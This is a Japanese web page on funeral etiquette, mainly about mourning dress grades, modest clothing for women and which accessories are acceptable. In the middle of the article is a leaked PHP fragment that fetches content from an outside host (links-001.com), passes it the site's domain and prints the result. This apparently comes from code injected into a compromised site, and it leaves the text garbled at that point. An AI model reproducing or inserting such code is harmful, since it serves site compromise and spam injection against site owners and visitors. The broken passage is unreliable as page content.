前へ
次へ

急な葬儀の準備と葬儀マナー

もしものことが合った時に、慌ててお葬式の準備を進める方もたくさんいますが、トラブルが起こらないように

more

葬儀マナーに照らし合わせてストッキングを選ぶ

日本では女性が葬儀に出席する際に着用出来るストッキングについては、葬儀マナーにより厳格に定められてい

more

形式にとらわれない時の葬儀マナー

今、宗教儀礼を行わない直葬を検討する終活者が増えてきています。
葬儀マナーとして、お葬式をあげ

more

守っておきたい服装における葬儀マナー

葬儀に参列する際には、マナー違反にならないよう十分に注意することが必要ですが、その中には葬儀に着用する服装に関するマナーがあります。
基本的に言って、喪主や遺族を始めとして葬儀に参列する人も全員喪服を着用するのが葬儀マナーであると言われています。
男性が着用する黒無地のビジネススーツは一見喪服に似ていると思われがちですが、実際には生地の質に大きな違いがあり、光沢が出ないような仕上がりになっているのが特徴です。
女性用のアンサンブルやワンピースなども同様で、喪服用のものを着用していくことが大切です。
葬儀で恥ずかしい思いをしないためには、服装に関して葬儀マナーをきちんと守ることが求められますが、注意しておきたいのは喪服であれば何でもよいというわけではないという点です。
礼服の一つでもある喪服にも、正喪服や準喪服、そして略喪服といった三つの格式に分けることができます。
そこで是非とも守るべきマナーとして覚えておきたいのは、遺族よりも格式の高い喪服を着用するべきではないということです。
どの格式の喪服を、誰がどんな場面で着用するべきなのかをはっきりと理解した上で選ぶことができます。
服装に関連した葬儀マナーの中には、極力肌を見せないようにする必要があるというものがあります。
男性は基本的にスーツを着用するため大きな問題にはなりませんが、女性の場合は十分の注意が必要です。
例えば、胸元が大きく開いているものやスカートの丈が短いもの、また袖が短すぎるようなものは避けるようにします。
具体的に言えば、スカートの丈は膝が隠れる長さのものを着用するのが基本ですし、袖も肘が隠れるくらいのものを選ぶようにします。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

葬儀に参列する際に守っておきたい服装に関連したマナーのもう一つの点は、アクセサリーの装着に関してです。
光沢のあるものは避ける必要があるため、基本的にアクセサリーは身につけずに参列するのが常識と言えるでしょう。
しかし、結婚指輪は外すことが求められているわけではありませんし、パールは涙の象徴として身につけても問題はないとされています。

Page Top